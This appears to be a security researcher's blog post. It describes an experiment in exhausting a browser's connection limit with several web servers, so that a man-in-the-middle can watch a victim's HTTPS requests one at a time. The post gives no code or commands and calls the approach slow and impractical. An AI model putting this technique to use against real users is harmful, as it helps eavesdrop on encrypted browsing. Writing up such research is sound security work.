19 posts left…
So Pyloris doesn’t work particularly well for port exhaustion on the server, but what if we can exhaust the connections on the client to better meter out traffic? That would make it easier for a MITM to see each individual request if it worked. So I started down a rather complicated path of using a mess load of link tags on an HTTP website trying to affect the connections on the HTTPS version of the same domain. No joy. It turns out that the limits placed on one port don’t affect what happens on another (at least in Firefox). So while I can exhaust all the connections to a domain over a single port I can’t do anything using HTTPS - or so it seemed (unless I was willing to muddy the water further by sending a bunch of requests that I knew are a certain size to the HTTPS site - which just seemed more painful than helpful).
Then, based on some earlier research I stormed into id’s office and I started bitching that there was no point in trying to stop port exhaustion if they were going to allow tons of connections, just over multiple sockets anyway. As the words came out of my mouth I realized I had come up with the answer - a ton of webservers. I guessed that there must be some upper bound of outbound connections and it’s probably at or less than 130. You should have seen id’s face as I asked him to set up 130 connections / 6 connections per socket = 22 web-servers for me. Hahah… I thought he’d kill me.
It turns out it’s nowhere near 130 open connections. Firefox sets a rather arbitrary 30 connection limit. So if you can create 5 open web-servers and exhaust 30 connections and only free up one long enough to allow the victim to download one request at a time, I think we’re in business. Makes sense in theory. The problem is that it’s REALLLLY slow. I mean… painful. In my testing it seemed more like the server was broken entirely from the victim’s perspective. But eventually… and in some cases I mean minutes later - it would load. I’m sure that the attack could be optimized to work based on the fact that no more packets are being sent when the image gets downloaded or whatever… which would signal the program to free up a connection. This is opposed to my crapola time based solution combined with chunked encoding to force the connection to stay open without downloading anything that I came up with for testing. So I bet this attack could work if someone put some tender loving care into it, but it was kind of a huge waste of time for me personally - and for poor id.
Incidentally, for those who have never seen or met id, and would like to know a little about the other side of webappsec that I don’t talk about much here (the configuration, operating system and network), you’re chance is nearing. There’s a rumor that he’ll be speaking at Lascon in October. He’ll be talking on how he’s managed to secure ha.ckers.org for all these years despite how much of a target I’ve made it. Should be fun.